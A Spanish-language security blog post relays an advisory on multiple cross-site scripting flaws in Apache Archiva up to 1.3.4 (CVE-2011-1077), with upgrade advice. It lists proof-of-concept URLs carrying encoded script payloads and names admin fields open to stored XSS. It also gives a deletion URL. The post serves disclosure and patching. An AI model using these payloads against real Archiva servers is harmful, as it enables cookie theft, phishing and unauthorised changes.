Nueva Vulnerabilidad en Apache

Noticias, Updates, de Seguridad

#Apache #Archiva Multiple #XSS #vulnerabilities

Esto es con respecto a varios XSS (Cross Site Scripting) Vulnerabilidades en Archiva Apache 1.3.4 (y versiones anteriores).

Proyecto: Archiva Apache
Severidad: Alta
Versiones: 1.3.0 – 1.3.4. Las versiones no compatibles Archiva 1.0 – 1.2.2  también se ven afectados.
Tipo Exploit: Múltiples XSS
Mitigación: Archiva 1.3.4 y anteriores usuarios deben actualizar a 1.3.5
Dirección del vendedor: http://archiva.apache.org/security.html
CVE: CVE-ID-2011-1077

Detalles de la vulnerabilidad:
El usuario puede insertar código HTML o ejecutar código JavaScript arbitrario en la aplicación vulnerable. Las vulnerabilidades se presentan debido a la insuficiencia de de validación de entradas en los campos de entrada múltiples a través de la aplicación. Una explotación exitosa de esta vulnerabilidad podría provocar, pero no limitado a, el compromiso de la solicitud, el robo basado en cookies credenciales de autenticación, la redirección de URL arbitrarios, divulgación o modificación de datos confidenciales y ataques de phishing.

Reflected XSS:
http://127.0.0.1:8080/archiva/security/useredit.action?username=test%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
http://127.0.0.1:8080/archiva/security/roleedit.action?name=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E
http://127.0.0.1:8080/archiva/security/userlist!show.action?roleName=test%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
http://127.0.0.1:8080/archiva/deleteArtifact!doDelete.action?groupId=1&artifactId=1&version=1&repositoryId=internal
http://127.0.0.1:8080/archiva/admin/addLegacyArtifactPath!commit.action?legacyArtifactPath.path=test%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript
%3E&groupId=test%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&artifactId=test%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&version=test%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&classifier=test%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&type=test%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E
http://127.0.0.1:8080/archiva/admin/deleteNetworkProxy!confirm.action?proxyid=test%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E

Persistant (Stored) XSS:
Exploit code: testhttp://127.0.0.1:8080/archiva/admin/addRepository.action
(Identifier:repository.id, Name:repository.name, Directory:repository.location, Index Directory:repository.indexDir)
http://127.0.0.1:8080/archiva/admin/confirmDeleteRepository.action?repoid=http://127.0.0.1:8080/archiva/admin/editAppearance.action (Name:organisationName, URL:organisation:URL, LogoURL:organisation:URL)
http://127.0.0.1:8080/archiva/admin/configureAppearance.action
http://127.0.0.1:8080/archiva/admin/addLegacyArtifactPath.action (Path:name=legacyArtifactPath.path, GroupId:groupId, ArtifactId:artifactId,Version:version, Classifier:classifier, Type:type)
http://127.0.0.1:8080/archiva/admin/legacyArtifactPath.action
http://127.0.0.1:8080/archiva/admin/addNetworkProxy.action
(Identifier:proxy.id, Protocol:proxy.protocol, Hostname:proxy.host, Port:proxy.port, Username:proxy.username)
http://127.0.0.1:8080/archiva/admin/networkProxies.action

Esperando que esta inforamción sea de utilidad

Reciban un cordial Saludo.

Comparte este Post:

Tags: , ,

Professional Ethical Hacker, Pentester & Forensics Investigator MPCS, CEH v8, CSSP, CICP-CICAP HTCIA Member & ISECOM Member Twitter: @victormirandamx

Deja un comentario





August 2018
M T W T F S S
« Oct    
 12345
6789101112
13141516171819
20212223242526
2728293031  
wordpress visitors